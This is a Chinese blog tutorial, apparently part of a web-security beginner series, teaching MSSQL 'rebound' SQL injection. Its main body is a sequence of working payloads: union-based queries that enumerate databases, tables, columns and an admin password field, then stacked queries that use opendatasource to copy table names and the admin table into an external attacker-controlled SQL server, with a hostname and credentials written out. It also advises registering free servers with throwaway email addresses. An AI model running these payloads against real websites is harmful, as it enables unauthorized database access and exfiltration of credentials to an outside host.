web安全入门(第五章-4)反弹注入

最新推荐文章于 2022-04-11 21:22:56 发布
最新推荐文章于 2022-04-11 21:22:56 发布
阅读量555 收藏 1
点赞数
分类专栏: 安全入门 文章标签: 数据库 sql 后端 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YINZHE_/article/details/106491958
版权

一、MSSQL反弹注入使用场景

	0,MSSQL数据库就是Sql server数据库
	1,前言
		MSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,
		存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖独特的攻击思路
	2,遇到问题
		明明有注入点却无法进行注入,工具攻击速度也是异常缓慢,错误提示信息关闭,
		无法返回注入结果,这些都是在注入攻击中常常遇到的问题。为例解决以上的疑难杂症,
		我们来学习反弹注入,反弹注入则依靠opendatasource函数支持
	3,简单总结
		反弹注入就是利用opendatasource函数,将当前数据库中的查询结果发送给另一个数据库中

二、快速搭建一个MSSQL环境

1,利用十分钟邮箱(例如:bccto.me)在香港云上白嫖一个服务器(webweb.com)
2,根据目标数据库,建立相同类型数据库,建立表(表名随意),字段(名字随意,字段一定相同)

三、MSSQL反弹注入语句解析

MSSQL于MYSQL不一样
联合查询为例:
	首先猜字段
	然后联合查询,要写union all
	然后猜输出点要使用NULL去填充


1.	例如:url id=1	
			id=1' union all select null,null,null from news -- qwe
			提一下:
					~union后注意有个 all
					~select后,不可以加1,2,3,也不是不可以,这的数据类型要一致。
						因为一般来说,我们都不知道,所以写null,即无类型
						之后,可以用asd来测试是不是字符,这样以此来测试
2,直接在sql server数据库中查询
	查库:	select name from dbo.sysdatabases	
			或者:select *from dbo.sysdatabases			
					//name是库默认属性
					//查询所有库,查出来有默认库,
	查表:	select *from dbo.sysobjects where xtype='U'	
					//稍微改一点关键词,注意增加xtype判断,后边的‘U’是用户的意思
					//代表查询用户创建的表,不然会查出很多表,
	查字段:select *from dbo.syscolumns where id=111

	id是SQL server表默认的字段,类似的还有name

显错注入

		判断是否存在注入
		输入and1=1 页面报错
		加一个’ 给他闭合
	
	查字段数
		‘ order by 3 页面正常
		‘ order by 4 页面错误 说明有3个字段
	MSSQL和MYSQL的区别
		联合查询最好加 all 发现加了all还是没有数据输出  mssql对语句比较严格,最好在填充位填 null 空的意思 页面正常,说明语法是对的

	找输出点
	先试试在第一个地方输入一个5
	页面出现一个5
		在第二个显错位输入字符串’a’ 页面正常
		在第三个显错位输入字符串’a’ 页面正常
	说明第一个只能输数字,因为union select他的核心在于要求两边的查询语句的结果的字段的数量和类型相同

	找到输出点,查询库名
	union all select dbid,name,null from master.dbo.sysdatabases

	查询表名
	union all select id,name,null from dbo.sysobjects where xtype='U'

	爆字段
	union all select null,name,null from dbo.syscolumns where id=1977058079

	爆内容
	union all select null,passwd,null from admin

反弹注入

	判断是否存在sql注入  ‘ and 1=1 -- qwe页面正常  ‘and 1=2 -- qwe页面错误 说名存在sql注入

	‘ order by 3 页面正常 order by 4 页面错误,说明存在三个字段
	在url栏中执行插入  页面正确,说明插入成功

	爆表名
	'; insert into opendatasource('sqloledb','server=SQL5006.webweb.com,1433;uid=DB_14D9383_yz_admin;pwd=12345678;database=DB_14D9383_yz').DB_14D9383_yz.dbo.aa select id,name,null,null from sysobjects where xtype='u'

	爆字段
	'; insert into opendatasource('sqloledb','server=SQL5006.webweb.com,1433;uid=DB_14D9383_yz_admin;pwd=12345678;database=DB_14D9383_yz').DB_14D9383_yz.dbo.aa select id,name,null,null from syscolumns where id=1977058079

	'; insert into opendatasource('sqloledb','server=SQL5006.webweb.com,1433;uid=DB_14D9383_yz_admin;pwd=12345678;database=DB_14D9383_yz').DB_14D9383_yz.dbo.aa select *from admin

	select *from aa  从aa表中查询所有内容

	语法:
	opendatasource(provider_name,init_string)
	provider_name:注册为用于访问数据源的OLEDB提供程序的UPROGID的名称,MSSQL的名称为SQLOLEDB
	init_string:
		连接字符串
		链接地址、端口、用户名、密码、数据库名
	'; insert into opendatasource('sqloledb','server=服务器地址;uid=用户;pwd=密码;database=库名').库名.dbo.表名 select * from admin
YINZHE_
关注
专栏目录
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
网络安全kali渗透学习 web渗透入门 Metasploit基本使用方法
xueshenlaila的博客
02-25 2984
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 这篇文章教大家了解Metasploit基本使用方法 以下有视频版还有文字版 不知道怎么操作的请看文字版的,里面详细的步骤。 关注公众号侠盗男爵回复【kali系统】 视频版↓: 网络安全/kali/黑客/web安全/渗透测
MSSQL注入反弹注入
MSB_WLAQ的博客
10-06 456
MSSQL反弹注入原理 依靠 opendatasource 函数,把查询出的数据发送到MSSQL服务器上。 MSSQL反弹注入使用场景 用香港云快速搭建一个MSSQL环境 可以用临时邮箱注册免费的试用60天。 免费60天的试用,过期了就换个邮箱。 1.猜数据时为什么不能用数字 根据了MSSQL的特性,虽然不能用数字但可用null和字母填充 2.MSSQL有系统自带库吗 有 为master.dbo.sysdatabase 3.反弹注入满足的条件 能否堆叠查询,...
MSSQL反弹注入
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-17 520
MSSSQL注入——反弹注入 我们首先先回顾一下MSSQL普通的显错注入(毕竟MSSQL显错注入和MYSQL不太一样) 我这里还是联合传为例子,首先猜字段,然后联合查询,记住要写union all,然后猜输出点,要使用NULL去填充,注释只有 – + select name from dbo.sysdatabases 查询系统库 sysobjects 查询系统表 (xtype=‘U’) syscolumns 字段 (id= ) 指定sysobjects库中表名对应id 先尝试显错注入 ‘ and o
MS SQL数据库——反弹注入
m0_46304840的博客
03-12 310
前言 正文 0x01 查表 0x02 查字段 0x03 查数据 0x04 总结 文末 前言 ms sql还有一些盲注啥的,就不去深入的去搞了,就再写一篇反弹注入 然而这边我们可以去搞个虚拟空间:香港云 涉及到的一个函数opendatasource() 可以看成open,data,source三个单词 语法:opendatasource(provider_name,ini...
18、注入篇--反弹注入(MSSQL
WX公众号-小白学安全
04-10 756
MSSQL MSSQL基础 MSSQL是指微软的SQLServer的数据库服务器 每个库都会自带有sysobjects表,其中有三个字段 name 当前数据库下的所有表名 id 相当于表名的标识 xtype 字段 中 U 代表用户创建的表名,S代表系统创建的 每个库都会自带有syscolumns表,其中有两个字段 name 每个表的字段名 id 对应sysobjects表中id字段 反弹注入 原理 原理:将目标站点中查询到的数据结果 传到攻击者的数据库注入条件
MSSQL注入——反弹注入
m0_55854679的博客
02-18 917
文章目录MSSQLSQL server】反弹注入使用场景快速搭建MSSQL环境MSSQL数据库反弹注入语句分析OPENDATASOURCE函数练习第一种方法——联合查询注入第二种方法——反弹注入+堆叠注入 MSSQLSQL server】反弹注入使用场景 与mysql大同小异,注入思路相同,但用到的函数等不同。 反弹注入 => 注入的手法(偏门)oob => 把查询到的数据插入外部的数据库(公网ip),反弹注入实际就是把查询出来的数据发送到我们的MSSQL服务器上。 快速搭建MSSQL
sqlmap 连接mysql_sqlmap从入门到精通-第三章-4-4-使用sqlmap直连MSSQL获取webshell或权限...
weixin_39896839的博客
01-30 745
4.4 使用sqlmap直连MSSQL获取webshell或权限在某些情况下可能不存在SQL注入漏洞,但是通过发现目标源代码泄露,备份泄露,文件包含等方法获取了数据库服务器的IP地址,数据库账户和密码,而且含有对外可以访问的端口,或者可以通过代理的方式能够访问到端口,简单点理解就是可以通过公网直连MSSQL数据库,那么这个时候就可以根据具体情况获取webshell或系统权限4.4.1 MSSQL数...
web安全攻防渗透测试实战指南
jhf223344的博客
04-05 9064
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 --exclude 19...
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8067
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
mssql反弹注入
笔墨稠思
11-25 404
1.反弹注入原理 通过opendatasource()将查询到的数据发送到mssql服务器 2.反弹注入使用条件 是否存在堆叠注入 注意事项: 1.mssql 对字段的数据类型要求严格,测试回显点时,可以使用null来代替字段,之后对null进行替换,找出争取的数据类型 2.在使用联合查询时,推荐使用union all 进行查询 3.之前在mysql中查询表和字段时使用的系统自带库 information_schema在mssql中也存在,仍然可以使用,也可以使用其系统自带表,sysobjects查询表名,
数据库注入学习笔记3---MSSQ注入(反弹注入)
qq_41759633的博客
08-07 570
引:MSSQL注射攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖的攻击思路,而反弹注入技术需要依靠opendatasource函数支持 opendatasource:‘使用opendatasource函数将当前数据库中查询的结果发送到另一数据库服务器中’ 攻击过程: 攻击前准备: 首先需要在攻击者主机的SQL server 2000...
五、注入(4)MSsql注入——反弹注入
weixin_45540609的博客
04-21 224
MSSQL反弹注入 当明明是注入点却无法进行注入注入工具猜解速度缓慢,错误提示信息关闭,无法返回注入结果等。这时比较好的方法就是使用反弹注入,需要依靠opendatasource函数支持。 反弹注入:目标站点把查询数据的结果插入到黑客的数据库里 条件: 1、网络通畅(需要公网ip) 2、自己的MSSQL数据库 可以申请一个免费的虚拟空间,虚拟空间中开启MSSQL然后直接使用,可以免去MSSQL安装环境且不需要特意购置云服务器来获取一个公网IP。 香港云 http://www.webweb..
网络安全入门到精通(第六章-4)MSsql注入 —— 反弹注入
划水的小白白
02-05 2042
本文内容: ~MSSQL反弹注入使用场景 ~快速搭建一个MSSQL环境(骚姿势) ~MSSQL反弹注入语句解析 ~MSSQL实战注意
mysql反弹注入平台_MSSQL注入--反弹注入
weixin_30284287的博客
02-11 231
明明是sql注入的点,却无法进行注入,注射工具拆解的速度异常的缓慢,错误提示信息关闭,无法返回注入的结果,这个时候你便可以尝试使用反弹注入反弹注入需要依赖于函数opendatasource的支持,将当前数据库中的查询结果发送到另一数据库服务器中。判断数据库类型and exists (select * from sysobjects)--返回正常为mssql(也名sql server)and ex...
Mssql注入——dns注入反弹注入
weixin_46601374的博客
02-28 2827
DNS注入 DNS注入原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。 load_file函数的作用 用于读取文件内容,并返回输出 load_file函数是什么 load_file 读取文件函数,读取的内容返回为字符串输出。 load_file函数在注入的作用 利用读取注入的报错信息,然后返回报错信息(显
oralce反弹注入攻击实战
chuancuili8770的博客
01-14 408
作者:BlAck.Eagle 声明:严禁按照本文进行攻击等非法操作,后果自负,本文旨在信息安全技术研究 估计大家读了《oracle注入实战之渗透联通》一文之后都会为之一震,但是笔者不知道读者朋友有没有遇到过和笔者相似的情况,就是用union select语句爆全部的表的时候,根本...
SQL注入(MSSQL反弹注入)---zkaq
weixin_38237216的博客
04-11 1550
1.概念 1.反弹注入:是一种把查询到的数据插入外部的数据库的方法 2.mysqlSql Server的区别(不同的函数、不同的系统自带库) mysql系统自带库:table_name,columns_name,information_schema等 mysql独有的语法limit MSSQL:sysconstraints,syssegments等 sysobjects:查询系统表 (xtype=‘U’),'U’代表用户自创的类型;'S’代表系统自带的类型 syscolumns 字段 (id= ) 指定
mysql注入反弹_一个mysql注入引发的通宵
weixin_34219634的博客
01-19 215
本来没准备通宵的,在t00ls看了会文章,然后准备睡觉,就在准备睡觉的时候,无意中发现了以前看过的某站(我属于看干劲做事的那种,当时没干劲,没搞下,然后最近干劲十足,在一看发现遍地是漏洞。。。)然后,我的通宵之mysql注入艰难拿shell就此开始......发现SQL注入漏洞跑了下二级,然后打开一个个随手测试,因为当时准备睡觉了,所以也就没想过认真搞。。。加个admin,后台出来,输入admin...
[第一章 web入门]sql注入-1
最新发布
06-28
### 回答1: SQL注入是一种常见的攻击方式,攻击者通过在Web应用程序中注入恶意的SQL语句,从而获取敏感信息或者执行非法操作。SQL注入攻击的原理是利用Web应用程序没有对用户输入的数据进行充分的过滤和验证,从而导致恶意SQL语句被执行。为了防止SQL注入攻击,开发人员需要对用户输入的数据进行严格的过滤和验证,同时使用参数化查询等技术来防止SQL注入攻击。 ### 回答2: SQL注入攻击是指攻击者通过把恶意的SQL语句插入到应用程序输入数据中的方法,来实现非法操作或篡改数据的一种攻击技术。攻击者利用SQL注入漏洞可以获取敏感数据,改变数据库中的数据,甚至完全控制应用程序。 攻击者利用SQL注入漏洞,可以通过几种方法来实现攻击。以下是一些常见的SQL注入攻击方式: 1.基于错误的注入:攻击者可以通过注入恶意SQL语句,导致应用程序出现错误或异常,从而获得应用程序内部的敏感数据。 2.盲注注入:攻击者可以通过注入语句,来获取数据库信息,如数据库版本,或者判断SQL查询的结果是否正确。 3.联合查询注入:攻击者可以通过在注入语句中添加SELECT语句,来获取敏感数据或执行一些非法操作。 SQL注入攻击作为一种常见的网络攻击方式,需要我们在开发过程中加强对应用程序输入数据进行过滤和检查,以防止SQL注入漏洞。以下是一些预防SQL注入攻击的方法: 1.使用参数化查询:应用程序可以使用参数化查询语句,通过绑定参数来保证输入数据不会被作为SQL语句的一部分执行。 2.限制用户输入:应用程序可以限制用户输入的字符集合,或对用户输入的内容进行验证和过滤。 3.对于敏感数据,可以使用加密等措施来保证数据的安全性。 总之,应用程序开发者需要认识到SQL注入攻击的威胁,并在开发过程中采取一些预防措施来保证应用程序的安全性。 ### 回答3: SQL注入是一种常见的网络攻击方式,旨在通过在输入框或者URL中注入SQL代码,以达到破坏或者获取数据库数据的目的。SQL注入可以通过输入合法的SQL语句来实现,或者通过输入特定的字符来执行恶意代码。 SQL注入攻击的原理在于,攻击者在输入框或者URL中输入包含SQL关键词的字符,这些字符会被解释成SQL命令执行,并且会以其余参数的身份执行,这意味着该攻击可以以管理员的身份执行,且能获取数据库的全部数据。 SQL注入攻击的表现可以是网站遭到入侵或者数据库中数据突然消失或者受到修改。为了防止SQL注入攻击,应该首先排除参数化输入的漏洞,即对于用户输入的数据需要进行过滤,过滤掉控制字符,即可有效地防止SQL注入攻击。 总之,SQL注入攻击是一种网络安全威胁,要防范此类攻击,网站管理者应当在网站上做好安全措施,确保用户输入的数据进行有效的过滤和检查以保证安全性。同时,网站用户也应避免输入不必要的信息和暴露个人隐私等信息,以避免成为攻击者的目标。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值